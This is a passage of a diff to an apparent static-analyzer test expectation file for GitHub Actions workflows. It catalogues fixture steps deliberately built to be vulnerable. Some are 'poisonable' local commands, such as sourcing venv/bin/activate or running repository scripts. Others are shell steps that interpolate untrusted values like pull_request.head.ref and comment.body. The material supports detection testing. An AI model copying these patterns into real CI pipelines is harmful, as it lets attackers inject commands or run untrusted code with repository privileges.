.github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -129,14 +130,17 @@ runExprs | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | runStepChildren | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | @@ -171,23 +175,23 @@ runStepChildren | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -340,86 +344,94 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | 